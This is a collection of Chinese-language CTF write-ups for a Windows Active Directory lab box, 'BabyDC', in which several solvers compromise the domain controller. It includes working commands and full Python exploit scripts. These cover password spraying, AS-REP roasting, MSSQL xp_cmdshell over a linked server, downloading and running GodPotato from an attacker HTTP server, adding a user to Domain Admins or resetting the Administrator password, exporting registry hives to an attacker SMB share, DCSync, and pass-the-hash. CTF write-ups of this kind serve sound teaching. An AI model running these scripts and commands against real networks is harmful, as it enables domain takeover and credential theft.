                smb_conn.getFile("ADMIN$", rf"Temp\{output_name}", callback)
                output = b"".join(chunks).decode("utf-8", errors="backslashreplace")
                if output.strip():
                    smb_conn.deleteFile("ADMIN$", rf"Temp\{output_name}")
                    return output
            except Exception as exc:
                last_error = exc
            time.sleep(1)
        raise RuntimeError(f"timed out waiting for remote output file {output_name}: {last_error}")
    finally:
        if service_handle is not None:
            try:
                scmr.hRDeleteService(dce, service_handle)
            except Exception:
                pass
            try:
                scmr.hRCloseServiceHandle(dce, service_handle)
            except Exception:
                pass
        try:
            scmr.hRCloseServiceHandle(dce, scm_handle)
        except Exception:
            pass
        try:
            dce.disconnect()
        except Exception:
            pass


def extract_proof(output: str, command: str) -> str:
    cleaned = re.sub(r"[\x00-\x08\x0b-\x1f]", "", output)
    if command == "whoami":
        match = re.search(r"(?im)^\s*(nt authority\\system)\s*$", cleaned)
    elif command == "hostname":
        match = re.search(r"(?im)^\s*(CASTLEVANIA)\s*$", cleaned)
    else:
        match = None
    if not match:
        raise RuntimeError(f"failed to extract proof line for {command}")
    return match.group(1)


def verify_shell(
    *,
    dump_path: Path,
    hash_line: str | None,
    domain: str,
    username: str,
    target_name: str,
    target_ip: str,
    smb_port: int,
    whoami_path: Path,
    hostname_path: Path,
    retries: int,
    retry_delay: int,
) -> tuple[str, str]:
    if not hash_line:
        ensure_exists(dump_path, "Run the full mode first or provide --hash-line.")
        hash_line = extract_hash_line(dump_path, username)

    lmhash, nthash = parse_hash_line(hash_line)
    identity = f"{domain}/{username}@{target_name}"
    print(f"[*] principal : {identity}")
    print(f"[*] target ip : {target_ip}:{smb_port}")
    print(f"[*] hashes    : {lmhash}:{nthash}")

    def run_with_retry(command: str) -> str:
        last_error = None
        for attempt in range(1, retries + 1):
            try:
                return smbexec_one_shot(
                    target_name=target_name,
                    target_ip=target_ip,
                    smb_port=smb_port,
                    domain=domain,
                    username=username,
                    password="",
                    lmhash=lmhash,
                    nthash=nthash,
                    command=command,
                )
            except Exception as exc:
                last_error = exc
                if attempt == retries:
                    break
                print(f"[*] retry {attempt}/{retries - 1} for {command}: {exc}")
                time.sleep(retry_delay)
        raise RuntimeError(f"{command} failed after {retries} attempts: {last_error}")

    whoami_output = run_with_retry("whoami")
    whoami_path.write_text(whoami_output, encoding="utf-8")
    whoami = extract_proof(whoami_output, "whoami")
    print(f"[+] whoami    : {whoami}")

    hostname_output = run_with_retry("hostname")
    hostname_path.write_text(hostname_output, encoding="utf-8")
    hostname = extract_proof(hostname_output, "hostname")
    print(f"[+] hostname  : {hostname}")

    return whoami, hostname


def do_full(args) -> int:
    python_exe = args.python.resolve()
    vboxmanage = args.vboxmanage.resolve() if args.vboxmanage else find_vboxmanage()
    wsl_exe = args.wsl.resolve() if args.wsl else find_wsl()
    secretsdump = args.secretsdump.resolve() if args.secretsdump else find_secretsdump(python_exe)

    ensure_exists(python_exe, "Use a Python interpreter with impacket installed.")

    args.vbox_home.mkdir(parents=True, exist_ok=True)
    args.offline_dir.mkdir(parents=True, exist_ok=True)
    (ROOT / "vm").mkdir(parents=True, exist_ok=True)

    print("[*] extracting OVA if needed")
    ensure_ova_extracted(args.ova, args.ovf, args.vmdk)

    print("[*] preparing VDI")
    ensure_vdi(vboxmanage, args.vmdk, args.vdi)

    print("[*] registering VM")
    ensure_vm_registered(vboxmanage, args.vbox_home, args.vm_dir, args.vdi)

    print("[*] setting NAT forwards")
    ensure_nat_rules(vboxmanage, args.vbox_home)

    print("[*] starting VM")
    restart_vm(vboxmanage, args.vbox_home, args.boot_wait)

    print("[*] copying offline hives from VMDK")
    copy_offline_hives(wsl_exe, ROOT, args.offline_dir, args.wsl_distro, args.vmdk)

    print("[*] running secretsdump")
    run_secretsdump(python_exe, secretsdump, args.offline_dir, args.dump)

    print("[*] verifying Administrator shell")
    whoami, hostname = verify_shell(
        dump_path=args.dump,
        hash_line=args.hash_line,
        domain=args.domain,
        username=args.user,
        target_name=args.target,
        target_ip=args.target_ip,
        smb_port=args.smb_port,
        whoami_path=args.whoami_out,
        hostname_path=args.hostname_out,
        retries=args.verify_retries,
        retry_delay=args.verify_delay,
    )
    print(f"[+] complete   : {whoami} @ {hostname}")
    return 0


def do_verify(args) -> int:
    print("[*] verifying Administrator shell")
    whoami, hostname = verify_shell(
        dump_path=args.dump,
        hash_line=args.hash_line,
        domain=args.domain,
        username=args.user,
        target_name=args.target,
        target_ip=args.target_ip,
        smb_port=args.smb_port,
        whoami_path=args.whoami_out,
        hostname_path=args.hostname_out,
        retries=args.verify_retries,
        retry_delay=args.verify_delay,
    )
    print(f"[+] complete   : {whoami} @ {hostname}")
    return 0


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(description="One-file local reproduction script for BabyDC.")
    parser.add_argument("--python", type=Path, default=Path(sys.executable), help="Python interpreter with impacket installed")
    parser.add_argument("--domain", default="XMCVE.local")
    parser.add_argument("--user", default="Administrator")
    parser.add_argument("--target", default="CASTLEVANIA.XMCVE.local")
    parser.add_argument("--target-ip", default="127.0.0.1")
    parser.add_argument("--smb-port", type=int, default=10445)
    parser.add_argument("--dump", type=Path, default=DEFAULT_DUMP)
    parser.add_argument("--hash-line", help="Explicit secretsdump line, overrides --dump in verify mode")
    parser.add_argument("--whoami-out", type=Path, default=DEFAULT_WHOAMI)
    parser.add_argument("--hostname-out", type=Path, default=DEFAULT_HOSTNAME)
    parser.add_argument("--verify-retries", type=int, default=12, help="Retry count for post-boot shell validation")
    parser.add_argument("--verify-delay", type=int, default=5, help="Seconds between shell validation retries")

    subparsers = parser.add_subparsers(dest="mode", required=True)

    full = subparsers.add_parser("full", help="Extract the disk, boot the VM, dump hashes, and verify SYSTEM execution")
    full.add_argument("--ova", type=Path, default=DEFAULT_OVA)
    full.add_argument("--ovf", type=Path, default=DEFAULT_OVF)
    full.add_argument("--vmdk", type=Path, default=DEFAULT_VMDK)
    full.add_argument("--vm-dir", type=Path, default=DEFAULT_VM_DIR)
    full.add_argument("--vdi", type=Path, default=DEFAULT_VDI)
    full.add_argument("--vbox-home", type=Path, default=DEFAULT_VBOX_HOME)
    full.add_argument("--offline-dir", type=Path, default=DEFAULT_OFFLINE_DIR)
    full.add_argument("--vboxmanage", type=Path, help="Override VBoxManage.exe")
    full.add_argument("--wsl", type=Path, help="Override wsl.exe")
    full.add_argument("--wsl-distro", default="kali-linux")
    full.add_argument("--secretsdump", type=Path, help="Override secretsdump.py")
    full.add_argument("--boot-wait", type=int, default=25, help="Seconds to wait after starting the VM")
    full.set_defaults(func=do_full)

    verify = subparsers.add_parser("verify", help="Use the dump or a hash line to prove SYSTEM execution")
    verify.set_defaults(func=do_verify)

    return parser


def main() -> int:
    parser = build_parser()
    args = parser.parse_args()
    return args.func(args)


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except Exception as exc:
        print(f"[-] {exc}", file=sys.stderr)
        raise

弱口令

出这个靶机实际上部分参考了xen-prolabs，当时随手设了几个干扰账户.....忘记修改为强密码了

导致可以越掉IIS，MSSQL，SMTP的Swaks欺骗三个考点，直接拿mowen账号来Backup Operators

俩名选手采用该方法解出题目

1. 用户枚举与口令喷洒

先用 kerbrute 跑一轮常见用户名：

kerbrute userenum -d XMCVE.local --dc 192.168.56.105 /usr/share/seclists/Usernames/top-usernames-shortlist.txt

命中的有效用户包括：

admin
sales
support
administrator
Admin
alucard

接着做一轮最常见弱口令喷洒：

kerbrute passwordspray -d XMCVE.local --dc 192.168.56.105 valid_users.txt 'Password123!'

命中结果：

admin:Password123!
sales:Password123!
support:Password123!
Admin:Password123!

这一步只拿到了普通域账号，没有直接管理权限。

2. BloodHound 找真正突破口

用已知凭据采集 BloodHound 数据：

bloodhound-python -u admin -p 'Password123!' -d XMCVE.local -dc CASTLEVANIA.XMCVE.local -ns 192.168.56.105 -c All --zip

在采集结果里，关键用户是 MOWEN@XMCVE.LOCAL。

已验证到的关键属性：

dontreqpreauth: true
serviceprincipalnames: HTTP/CASTLEVANIA.XMCVE.local
member of: BACKUP OPERATORS

同时还能看到：

ALUCARD@XMCVE.LOCAL -> member of local Administrators

但 alucard 当前没有口令，暂时走不通。

因此最优路径变成：

先打 mowen 的 AS-REP Roast
再利用其 Backup Operators 权限打域控

3. AS-REP Roast 拿下 mowen

因为 mowen 开启了“不需要预认证”，可以直接请求 AS-REP：

impacket-GetNPUsers XMCVE.local/mowen -dc-ip 192.168.56.105 -no-pass -request

拿到哈希后用 John 爆破：

john mowen.asrep --wordlist=/usr/share/wordlists/rockyou.txt
john --show mowen.asrep

爆破结果：

mowen:1maxwell

至此得到可用凭据：

XMCVE.local\mowen : 1maxwell

土豆提权

通过Mssql的账户权限-SeImpersonatePrivilege进行土豆提权

三名选手采用该方法解出题目

手法一

1. SQL 利用

通过wuwupor / lovlyBaby登录mssql

确认配置项时还能看到 linked server的xp_cmdshell 已经开启：

SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Ad Hoc Distributed Queries', 'clr enabled', 'remote access');

于是可以直接通过 POO_PUBLIC 执行系统命令：

EXEC ('EXEC xp_cmdshell ''whoami''') AT POO_PUBLIC;

返回身份是：

xmcve\sqlsvc

接着看权限：

EXEC ('EXEC xp_cmdshell ''whoami /priv''') AT POO_PUBLIC;

输出里最关键的一项是：

SeImpersonatePrivilege Enabled

这说明 sqlsvc 已经满足典型的本地提权条件，只差一条能把 SeImpersonatePrivilege 用起来的链。这里直接使用 GodPotato，它对 Windows Server 2019 可用。

2. 系统提权

利用思路非常直接：

用 xp_cmdshell 下发 GodPotato.exe
让 GodPotato 以 SYSTEM 身份执行一条命令
把已知明文口令的 sqlsvc / Sql!2026 加进 Domain Admins
重新用 sqlsvc / Sql!2026 发起网络登录，直接拿管理员级远程会话

GodPotato 先用 whoami 验证时，返回结果里已经能看到：

CurrentUser: NT AUTHORITY\SYSTEM

然后执行：

net group "Domain Admins" sqlsvc /add /domain

命令成功后，重新使用 sqlsvc / Sql!2026 进行远程执行，就能拿到管理员级 shell。这里用 psexec 验证，返回结果是：

nt authority\system
CASTLEVANIA

成功拿到admin shell

3.Exp

下面给出完整利用脚本。脚本会先连 SQL，确认 POO_PUBLIC 可用，然后临时开启一个本地 HTTP 服务，把同目录中的 GodPotato.exe 下发到目标，执行提权，再自动调用 psexec 拉起管理员 shell。

import argparse
import contextlib
import functools
import http.server
import shutil
import socket
import socketserver
import subprocess
import sys
import threading
import time
from pathlib import Path

import pytds


def quote_sql(value: str) -> str:
    return value.replace("'", "''")


def get_local_ip_for_target(target_ip: str) -> str:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.connect((target_ip, 1433))
        return sock.getsockname()[0]
    finally:
        sock.close()


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, fmt: str, *args) -> None:
        pass


class ThreadingHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
    daemon_threads = True
    allow_reuse_address = True


@contextlib.contextmanager
def serve_directory(directory: Path, host: str):
    handler = functools.partial(QuietHandler, directory=str(directory))
    server = ThreadingHTTPServer((host, 0), handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        yield server.server_address[1]
    finally:
        server.shutdown()
        server.server_close()
        thread.join(timeout=1)


class MSSQLExploit:
    def __init__(self, server: str, user: str, password: str, database: str = "master", port: int = 1433):
        self.conn = pytds.connect(
            server=server,
            database=database,
            user=user,
            password=password,
            port=port,
            validate_host=False,
            use_tz=False,
            autocommit=True,
        )

    def close(self) -> None:
        self.conn.close()

    def run_query(self, query: str):
        cur = self.conn.cursor()
        cur.execute(query)
        if not cur.description:
            return []
        rows = cur.fetchall()
        columns = [c[0] for c in cur.description]
        return [dict(zip(columns, row)) for row in rows]

    def xp_cmdshell_via_public(self, command: str):
        query = f"EXEC ('EXEC xp_cmdshell ''{quote_sql(command)}''') AT POO_PUBLIC"
        return self.run_query(query)


def print_rows(title: str, rows) -> None:
    print(f"\n=== {title} ===")
    if not rows:
        print("(no rows)")
        return
    for row in rows:
        print(row)


def ensure_psexec() -> str:
    candidates = [
        shutil.which("psexec.py"),
        str(Path(sys.executable).with_name("psexec.py")),
        str(Path(sys.executable).resolve().parent.parent / "Scripts" / "psexec.py"),
    ]
    for candidate in candidates:
        if candidate and Path(candidate).exists():
            return candidate
    raise FileNotFoundError("psexec.py not found in PATH or next to the current Python installation.")


def main() -> int:
    parser = argparse.ArgumentParser(description="Exploit for codegate babydc.")
    parser.add_argument("--target", default="192.168.124.7")
    parser.add_argument("--sql-user", default="wuwupor")
    parser.add_argument("--sql-password", default="lovlyBaby")
    parser.add_argument("--domain", default="XMCVE")
    parser.add_argument("--pivot-user", default="sqlsvc")
    parser.add_argument("--pivot-password", default="Sql!2026")
    parser.add_argument("--command", default="cmd.exe", help="Command passed to psexec after sqlsvc becomes Domain Admin.")
    args = parser.parse_args()

    base_dir = Path(__file__).resolve().parent
    godpotato = base_dir / "GodPotato.exe"
    if not godpotato.exists():
        raise FileNotFoundError(f"Missing helper: {godpotato}")

    target_ip = args.target
    local_ip = get_local_ip_for_target(target_ip)
    print(f"[+] target: {target_ip}")
    print(f"[+] local callback IP: {local_ip}")

    sql = MSSQLExploit(target_ip, args.sql_user, args.sql_password)
    try:
        print_rows(
            "linked server context",
            sql.run_query(
                "EXEC ('SELECT @@SERVERNAME AS server_name, SYSTEM_USER AS current_login, "
                "IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT POO_PUBLIC"
            ),
        )
        print_rows("xp_cmdshell identity", sql.xp_cmdshell_via_public("whoami /priv"))

        with serve_directory(base_dir, "0.0.0.0") as port:
            download_cmd = (
                'powershell -c "try {(New-Object Net.WebClient).DownloadFile('
                f"'http://{local_ip}:{port}/{godpotato.name}',"
                "'C:\\Windows\\Temp\\GodPotato.exe');"
                'Write-Output OK} catch { Write-Output $_.Exception.Message }"'
            )
            print_rows("download helper", sql.xp_cmdshell_via_public(download_cmd))
            print_rows(
                "helper presence",
                sql.xp_cmdshell_via_public(
                    'powershell -c "Get-Item \'C:\\Windows\\Temp\\GodPotato.exe\' | '
                    'Select-Object Name,Length | Format-List"'
                ),
            )

        add_group_cmd = (
            'C:\\Windows\\Temp\\GodPotato.exe -cmd '
            f'"cmd /c net group \\"Domain Admins\\" {args.pivot_user} /add /domain"'
        )
        print_rows("godpotato group add", sql.xp_cmdshell_via_public(add_group_cmd))
        time.sleep(2)
    finally:
        sql.close()

    psexec = ensure_psexec()
    user_spec = f"{args.domain}/{args.pivot_user}:{args.pivot_password}@{target_ip}"
    cmd = [sys.executable, psexec, user_spec, args.command]
    print(f"[+] launching psexec: {' '.join(cmd)}")
    return subprocess.call(cmd)


if __name__ == "__main__":
    raise SystemExit(main())

手法二

GodPotato

由于系统是 Windows Server 2019，且 sqlsvc 拥有 SeImpersonatePrivilege，直接换成 GodPotato 即可。

我在宿主机开了一个临时 HTTP 服务，把 GodPotato-NET4.exe 投到客机，然后通过 SQL 执行：

C:\Windows\Temp\GodPotato-NET4.exe -cmd "cmd /c net user Administrator Xmctf2026Aa /domain"

GodPotato 的关键回显如下：

[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] Start Search System Token
[*] PID : 804 Token:0x800  User: NT AUTHORITY\SYSTEM
[*] Find System Token : True
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid ...
The command completed successfully.

这说明链条已经把 sqlsvc 抬到了 SYSTEM，并成功执行了我们给它的命令。

随后再查：

net user Administrator /domain

可以看到 Password last set 已经更新，说明域管理员密码确实被改掉了。

验证 Administrator shell

最后直接用新密码通过 impacket 的 wmiexec.py 验证远程管理员执行：

python wmiexec.py XMCVE/Administrator:Xmctf2026Aa@169.254.212.20 whoami
python wmiexec.py XMCVE/Administrator:Xmctf2026Aa@169.254.212.20 hostname

回显：

xmcve\administrator
CASTLEVANIA

这一步已经满足题目要求的：

拿到 Administrator shell

补充：本地 flag 文本的恢复

虽然官方 flag 要人工审核后发放，但镜像里其实残留了一个已经删除的本地 flag 文件线索。

在 Alucard 的 Recent 里有一个快捷方式：

C:\Users\Alucard\Recent\flag.lnk

它指向：

C:\Users\Administrator\Desktop\flag.txt

这个文件本身已经被删掉了，但在回收站目录中仍然留有内容文件：

$Recycle.Bin\S-1-5-21-...-500$RIZ9PVX.txt

离线读这个文件，能恢复出：

FLAG{XMCVE_Castlevania_Bloodlines_DA_Pwned}

Exploit

完整利用脚本放在：

from __future__ import annotations

import subprocess
import sys
import threading
from dataclasses import dataclass
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from pathlib import Path

from impacket import tds


TARGET_IP = "169.254.212.20"
HOST_HTTP_IP = "169.254.212.1"
HOST_HTTP_PORT = 8000

SQL_USER = "wuwupor"
SQL_PASS = "lovlyBaby"
NEW_ADMIN_PASS = "Xmctf2026Aa"


@dataclass
class HttpServerContext:
    server: ThreadingHTTPServer
    thread: threading.Thread

    def close(self) -> None:
        self.server.shutdown()
        self.server.server_close()
        self.thread.join(timeout=3)


class QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, format: str, *args) -> None:  # noqa: A003
        return


def start_http_server(directory: Path) -> HttpServerContext:
    handler = lambda *args, **kwargs: QuietHandler(*args, directory=str(directory), **kwargs)
    server = ThreadingHTTPServer((HOST_HTTP_IP, HOST_HTTP_PORT), handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    return HttpServerContext(server=server, thread=thread)


def sql_connect() -> tds.MSSQL:
    mssql = tds.MSSQL(TARGET_IP, 1433)
    mssql.connect()
    ok = mssql.login(None, SQL_USER, SQL_PASS, None, None, useWindowsAuth=False)
    if not ok:
        raise RuntimeError("failed to log into MSSQL with recovered credentials")
    return mssql


def exec_via_public(mssql: tds.MSSQL, command: str) -> list[str]:
    sql = "exec ('exec master..xp_cmdshell ''%s''') at POO_PUBLIC" % command.replace("'", "''")
    mssql.sql_query(sql)
    return [row["output"] for row in getattr(mssql, "rows", []) if row.get("output") != "NULL"]


def verify_admin_shell() -> str:
    script = Path(sys.executable).parent / "Scripts" / "wmiexec.py"
    if not script.exists():
        script = Path(r"C:\Users\25478\AppData\Roaming\Python\Python314\Scripts\wmiexec.py")
    cmd = [
        sys.executable,
        str(script),
        f"XMCVE/Administrator:{NEW_ADMIN_PASS}@{TARGET_IP}",
        "whoami",
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=120, check=True)
    return result.stdout


def main() -> int:
    base_dir = Path(__file__).resolve().parent
    godpotato = base_dir / "GodPotato-NET4.exe"
    if not godpotato.exists():
        raise FileNotFoundError(f"missing {godpotato}")

    http_ctx = start_http_server(base_dir)
    try:
        mssql = sql_connect()
        try:
            steps = [
                (
                    "download GodPotato",
                    f'powershell -nop -c "iwr -UseBasicParsing http://{HOST_HTTP_IP}:{HOST_HTTP_PORT}/{godpotato.name} '
                    f'-OutFile C:\\Windows\\Temp\\{godpotato.name}"',
                ),
                (
                    "reset Administrator password via SYSTEM",
                    f'C:\\Windows\\Temp\\{godpotato.name} -cmd "cmd /c net user Administrator {NEW_ADMIN_PASS} /domain"',
                ),
                ("show Administrator account", "net user Administrator /domain"),
            ]

            for title, command in steps:
                print(f"[+] {title}")
                for line in exec_via_public(mssql, command):
                    print(line)
                print()
        finally:
            mssql.disconnect()

        print("[+] verifying Administrator shell with wmiexec")
        print(verify_admin_shell())
        return 0
    finally:
        http_ctx.close()


if __name__ == "__main__":
    raise SystemExit(main())

脚本做的事情是：

在宿主机开启临时 HTTP 服务。
用 wuwupor / lovlyBaby 登录 MSSQL。
通过 linked server POO_PUBLIC 执行 xp_cmdshell。
向客机投递并运行 GodPotato-NET4.exe。
把 Administrator 的域密码改成已知值。
调用 wmiexec.py 验证 Administrator shell。

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/myself-machine/castlevania-documents/

PolarisCTF-BabyDC(Unexpected)

呼啸山庄 — Mon, 30 Mar 2026 00:00:00 GMT

Wh1teSu（域用户-弱口令）

结论

这题的核心利用链是：

通过 Kerberos 用户枚举拿到一批有效用户名
用弱口令喷洒拿到低权限域用户
用 BloodHound 数据确认 mowen 开启 Do not require Kerberos preauthentication，且属于 Backup Operators
对 mowen 做 AS-REP Roast，爆破出密码 1maxwell
结合 GitHub MCP 查到的 backup_dc_registry 思路，利用 reg.py backup 让域控把 SAM/SYSTEM/SECURITY 直接备份到 Kali 的 SMB 共享
从离线 hive 提取出域控机器账户 CASTLEVANIA$ 的 NTLM
使用机器账户做 DCSync，拿到 Administrator 哈希
PTH 到目标主机，成功获得 Administrator shell

题目要求是“拿到 Administrator 的 shell 即可”，到第 8 步已经满足。

目标信息

已知开放端口如下：

53, 80, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, 9389

进一步探测：

nmap -sV -sC -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,9389 192.168.56.105

关键结果：

Host: CASTLEVANIA.XMCVE.local

Domain: XMCVE.local

80/tcp: IIS 10

1433/tcp: Microsoft SQL Server 2016

HTTP 首页只有一个维护页面：

CASTLEVANIA Portal

Employee Portal

Under maintenance...

说明真正入口大概率不在 Web，而是在 AD 身份面。

1. 用户枚举与口令喷洒

先用 kerbrute 跑一轮常见用户名：

kerbrute userenum -d XMCVE.local --dc 192.168.56.105 /usr/share/seclists/Usernames/top-usernames-shortlist.txt

命中的有效用户包括：

admin
sales
support
administrator
Admin
alucard

接着做一轮最常见弱口令喷洒：

kerbrute passwordspray -d XMCVE.local --dc 192.168.56.105 valid_users.txt 'Password123!'

命中结果：

admin:Password123!
sales:Password123!
support:Password123!
Admin:Password123!

这一步只拿到了普通域账号，没有直接管理权限。

2. BloodHound 找真正突破口

用已知凭据采集 BloodHound 数据：

bloodhound-python -u admin -p 'Password123!' -d XMCVE.local -dc CASTLEVANIA.XMCVE.local -ns 192.168.56.105 -c All --zip

在采集结果里，关键用户是 MOWEN@XMCVE.LOCAL。

已验证到的关键属性：

dontreqpreauth: true
serviceprincipalnames: HTTP/CASTLEVANIA.XMCVE.local
member of: BACKUP OPERATORS

同时还能看到：

ALUCARD@XMCVE.LOCAL -> member of local Administrators

但 alucard 当前没有口令，暂时走不通。

因此最优路径变成：

先打 mowen 的 AS-REP Roast
再利用其 Backup Operators 权限打域控

3. AS-REP Roast 拿下 mowen

因为 mowen 开启了“不需要预认证”，可以直接请求 AS-REP：

impacket-GetNPUsers XMCVE.local/mowen -dc-ip 192.168.56.105 -no-pass -request

拿到哈希后用 John 爆破：

john mowen.asrep --wordlist=/usr/share/wordlists/rockyou.txt
john --show mowen.asrep

爆破结果：

mowen:1maxwell

至此得到可用凭据：

XMCVE.local\mowen : 1maxwell

4. 用 mowen 做资产验证

先看 SMB 权限：

nxc smb 192.168.56.105 -u mowen -p '1maxwell' -d XMCVE.local --shares

已验证结果：

ADMIN$    READ
C$        READ,WRITE
IPC$      READ
NETLOGON  READ
SYSVOL    READ

但常规远程执行并不通：

atexec.py ...
wmiexec.py ...
psexec.py ...

结果分别遇到：

rpc_s_access_denied
ADMIN$/C$ not writable enough for service drop

说明 mowen 的价值不是直接执行，而是其 Backup Operators 身份。

顺手还从站点目录里发现了一个低价值 SQL 凭据：

C:\inetpub\wwwroot\poo_connection.txt
server=localhost;
user=wuwupor;
password=lovlyBaby
database=master

验证后发现 wuwupor 只是低权限 SQL 登录：

SYSTEM_USER = wuwupor
IS_SRVROLEMEMBER('sysadmin') = 0
xp_cmdshell denied

因此 MSSQL 这条线是干扰项，不是正解。

5. GitHub MCP 确认 Backup Operators 利用法

这里我没有凭记忆硬打，而是用 GitHub MCP 查公开实现。

检索后定位到：

horizon3ai/backup_dc_registry

仓库 README 明确说明：

abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY hives

其核心用法是：

python3 reg.py user:pass@dc backup -p '\attacker\share'

再对照本机 reg.py -h，确认当前环境中的 Impacket 已内置 backup 动作，且参数形式为：

reg.py 'domain/user:pass@target' backup -o '\attacker\share'

这一步非常关键，因为之前如果把输出写成本地目录，命令会失败；正确思路是让目标机把 hive 备份到攻击机暴露的 UNC 路径。

6. 让域控反向备份注册表 hive 到 Kali

先在 Kali 上起一个 SMB 接收共享：

mkdir -p /tmp/regshare
smbserver.py -smb2support -ip 192.168.56.101 share /tmp/regshare

我的 Kali 在目标网段的地址是：

192.168.56.101

然后直接执行备份：

reg.py 'XMCVE.local/mowen:1maxwell@192.168.56.105' -dc-ip 192.168.56.105 backup -o '\192.168.56.101\share'

已验证输出：

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\192.168.56.101\share\SAM.save
[*] Saved HKLM\SYSTEM to \\192.168.56.101\share\SYSTEM.save
[*] Saved HKLM\SECURITY to \\192.168.56.101\share\SECURITY.save

共享目录落地成功：

/tmp/regshare/SAM.save
/tmp/regshare/SYSTEM.save
/tmp/regshare/SECURITY.save

7. 离线提取机器账户哈希

对回传的 hive 做离线 secretsdump：

secretsdump.py -sam /tmp/regshare/SAM.save -system /tmp/regshare/SYSTEM.save -security /tmp/regshare/SECURITY.save LOCAL

关键结果有两个：

本地 SAM 里的 Administrator 哈希
更重要的域控机器账户 $MACHINE.ACC

提取结果中的核心值：

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7ca8289eae8ab9490db2bfee75bc0d78

因为目标本身是域控，机器账户 CASTLEVANIA$ 属于 Domain Controllers，天然具备目录复制能力，所以这一步足够直接推进到 DCSync。

先验证机器账户哈希可用：

nxc smb 192.168.56.105 -u 'CASTLEVANIA$' -H '7ca8289eae8ab9490db2bfee75bc0d78' -d XMCVE.local

结果：

[+] XMCVE.local\CASTLEVANIA$:7ca8289eae8ab9490db2bfee75bc0d78

8. 用机器账户做 DCSync 拿 Administrator

接着直接用机器账户哈希做 DCSync：

secretsdump.py -just-dc-user Administrator -hashes ':7ca8289eae8ab9490db2bfee75bc0d78' 'XMCVE.local/CASTLEVANIA$@192.168.56.105' -dc-ip 192.168.56.105

成功回显：

[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::

至此得到：

XMCVE.local\Administrator NTLM = d94f9831271e229dbc6e712097b63168

9. PTH 获取 Administrator shell

最后直接 PTH：

wmiexec.py -hashes ':d94f9831271e229dbc6e712097b63168' 'XMCVE.local/Administrator@192.168.56.105' 'whoami /all'

已验证输出中的关键部分：

User Name
xmcve\administrator

以及高权限组：

XMCVE\Domain Admins
XMCVE\Enterprise Admins
XMCVE\Schema Admins
BUILTIN\Administrators

这说明已经稳定取得 Administrator shell，题目完成。

最终利用链复盘

这题的设计点其实很明确：

弱口令只是入口，不是终点
真正核心是 BloodHound 给出的 mowen -> Backup Operators + no preauth
Backup Operators 在域控上非常危险，因为它能把注册表 hive 备份出来
一旦拿到域控机器账户 hash，就能直接 DCSync
DCSync 之后再 PTH 到 Administrator，整条链就闭环了

最短路径可以概括成一句话：

弱口令域用户 -> BloodHound 定位 mowen -> AS-REP Roast -> Backup Operators 远程导出 hive -> 机器账户 hash -> DCSync -> PTH Administrator

关键命令汇总

# 用户枚举
kerbrute userenum -d XMCVE.local --dc 192.168.56.105 users.txt

# 弱口令喷洒
kerbrute passwordspray -d XMCVE.local --dc 192.168.56.105 valid_users.txt 'Password123!'

# BloodHound 采集
bloodhound-python -u admin -p 'Password123!' -d XMCVE.local -dc CASTLEVANIA.XMCVE.local -ns 192.168.56.105 -c All --zip

# AS-REP Roast
impacket-GetNPUsers XMCVE.local/mowen -dc-ip 192.168.56.105 -no-pass -request
john mowen.asrep --wordlist=/usr/share/wordlists/rockyou.txt

# 起 SMB 接收共享
smbserver.py -smb2support -ip 192.168.56.101 share /tmp/regshare

# 远程导出 hive
reg.py 'XMCVE.local/mowen:1maxwell@192.168.56.105' -dc-ip 192.168.56.105 backup -o '\\192.168.56.101\share'

# 离线提取
secretsdump.py -sam /tmp/regshare/SAM.save -system /tmp/regshare/SYSTEM.save -security /tmp/regshare/SECURITY.save LOCAL

# 机器账户 DCSync
secretsdump.py -just-dc-user Administrator -hashes ':7ca8289eae8ab9490db2bfee75bc0d78' 'XMCVE.local/CASTLEVANIA$@192.168.56.105' -dc-ip 192.168.56.105

# PTH 验证 Administrator shell
wmiexec.py -hashes ':d94f9831271e229dbc6e712097b63168' 'XMCVE.local/Administrator@192.168.56.105' 'whoami /all'

Lkin（本地挂载）

解题思路

通过离线挂载域控硬盘提取 AD 凭据，再利用 Pass-the-Hash 攻击直接以管理员身份登录靶机，最终获得 nt authority\system 权限。

解题过程

1. 挂载硬盘并提取 NTDS 数据库

将 Windows 域控的虚拟硬盘挂载到 Kali Linux，复制 AD 数据库文件：

ntds.dit：Active Directory 数据库，存储所有域用户的凭据 Hash

SYSTEM：注册表 Hive，包含解密 ntds.dit 所需的 BootKey

sudo cp /mnt/win/Windows/NTDS/ntds.dit ~/Desktop/
sudo cp /mnt/win/Windows/System32/config/SYSTEM ~/Desktop/

2. 离线提取域用户 Hash

使用 impacket-secretsdump 离线解密 ntds.dit：

关键发现：Administrator 与 Alucard 共享同一个 NT Hash，多个普通用户也共享同一个 Hash，说明存在弱密码策略。

sudo impacket-secretsdump -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM LOCAL

3. 确定靶机 IP

将硬盘放回靶机，两台 VM 网络均改为桥接模式，启动后在 Kali 中扫描：

发现靶机 IP：192.168.81.124（MAC: 08:00:27:65:5F:89，VirtualBox NIC）

nmap -sn 192.168.81.0/24

4. Pass-the-Hash 攻击

